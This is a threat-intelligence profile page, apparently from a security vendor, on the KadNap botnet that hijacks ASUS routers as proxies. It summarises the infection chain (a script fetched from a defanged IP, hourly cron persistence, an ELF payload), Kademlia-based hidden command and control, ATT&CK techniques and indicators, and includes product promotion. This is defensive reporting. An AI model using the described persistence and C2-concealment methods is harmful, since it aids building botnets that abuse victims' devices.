KadNap
KadNap is a botnet malware family targeting ASUS routers and other edge networking devices, primarily SOHO/edge devices, and converting them into proxies for malicious traffic. Black Lotus Labs at Lumen reported tracking the botnet since August 2025, with growth to more than 14,000 infected devices; the majority of victims were ASUS routers, and over 60% of observed infections were in the United States, with additional concentrations reported in Taiwan, Hong Kong, and Russia. The malware is linked by Lumen and Spur to the Doppelganger proxy service, which researchers assess is likely a rebrand or successor of the defunct Faceless service previously associated with TheMoon malware. Access to infected devices is described as being monetized for malicious traffic routing and abuse including anonymous DDoS activity, credential stuffing, brute-force attacks, and targeted exploitation campaigns.
The infection chain described in the reporting begins with retrieval of a shell script named aic.sh from 212.104.141[.]140. That script establishes persistence via a cron job scheduled for the 55-minute mark of every hour, renames the fetched script to .asusrouter, and executes it from /jffs/.asusrouter. KadNap then downloads and executes a malicious ELF payload renamed kad, with samples identified for ARM and MIPS architectures. On execution, the malware forks, redirects standard streams to /dev/null, determines the device’s external IP address, and queries NTP servers for current time and uptime-related values.
KadNap uses a custom implementation of the Kademlia distributed hash table protocol to conceal command-and-control infrastructure within peer-to-peer traffic. It uses BitTorrent bootstrap nodes for peer discovery, derives values from NTP data and host uptime, generates custom hashes to locate peers, and decrypts peer-delivered payloads using a hardcoded key before using SHA-1-derived keys and encrypted communications for later stages. Researchers reported retrieval of additional payloads including fwr.sh, likely used to apply firewall rules such as closing port 22, and /tmp/.sose, which contained command-and-control IP:port pairs and configuration data. The malware’s parent process reads filenames from a pipe and executes the referenced files.
Although KadNap uses a P2P/Kademlia design intended to complicate C2 discovery and takedown, Black Lotus Labs found a weakness in the implementation: the same two persistent final-hop/intermediary nodes, 45.135.180[.]38 and 45.135.180[.]177, repeatedly appeared before C2 contact, indicating attacker-maintained persistent nodes rather than a fully decentralized design. Lumen reported KadNap typically used three to four active C2 servers on average and stated it had blocked traffic to and from the identified control infrastructure and planned to publish indicators of compromise.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Execution
2 techniques
Execution
Persistence
2 techniques
Persistence
Privilege Escalation
3 techniques
Privilege Escalation
Stealth
3 techniques
Stealth
The file sets up a cron job to pull the malicious shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter and then run it from /jffs/.asusrouter location. After the persistence was initialized, it would then pull down a malicious ELF file for the Asus routers, rename it to kad, and then execute it.
Credential Access
2 techniques
Credential Access
Discovery
3 techniques
Discovery
Each sample begins initialization by forking, setting STDIN, STDOUT and STDERR to /dev/null, determining the external IP address, and storing into an initialized struct.
The above function, labeled tmpSose, will check for the presence of the file /tmp/.sose and if it exists, it will read ten bytes from the file.
Next it will cycle through a list of NTP servers until it makes a connection, retrieves the current time and stores it along with the host uptime. These values are used later in the network communications to create a hash used to “phone friends” and find other peers in the network.
Lateral Movement
1 technique
Lateral Movement
Command and Control
6 techniques
Command and Control
It will connect to the peer and receive a buffer 0x1000 bytes in size and uses a hardcoded key to decrypt it. It then SHA-1 hashes the decrypted payload and uses the hash as the key to encrypt/decrypt follow on traffic... This hash is used as the key to AES encrypt/decrypt follow on traffic.
KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server.
This threat primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic... Once added to the network, bots are then marketed by a proxy service called “Doppelganger.”
This threat primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic... Once added to the network, bots are then marketed by a proxy service called “Doppelganger”.
Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists.
Our investigation into these C2s uncovered a malicious file which was used to download a shell script from a server at 212.104.141[.]140, in a file called aic.sh... After the persistence was initialized, it would then pull down a malicious ELF file for the Asus routers, rename it to kad, and then execute it.
Impact
1 technique
Impact
An IoT botnet is a network of compromised IoT devices that attackers remotely manipulate to launch large-scale cyber attacks, typically in the form of distributed denial of service (DDoS) attacks. In October 2025, Microsoft Azure was hit with a record-breaking multi-vector, cloud DDoS attack that peaked at 15.72 Tbps and 3.64 billion packets per second.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A newly identified malware strain that infected edge devices, especially Asus routers, and enrolled them into the Doppelgänger proxy service to facilitate anonymous DDoS campaigns.
Proxying botnet targeting ASUS routers and other edge devices; uses a Kademlia DHT-based peer discovery/communications mechanism and C2 infrastructure to coordinate infected devices.
Botnet malware targeting routers and edge devices, using a decentralized Kademlia-based peer-to-peer command-and-control architecture to build a distributed proxy network for relaying malicious traffic and hiding criminal activity.
Botnet malware targeting routers and edge devices, especially Asus and SOHO devices, to build a decentralized proxy network that relays malicious traffic through compromised residential IPs using a Kademlia-based peer-to-peer architecture.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.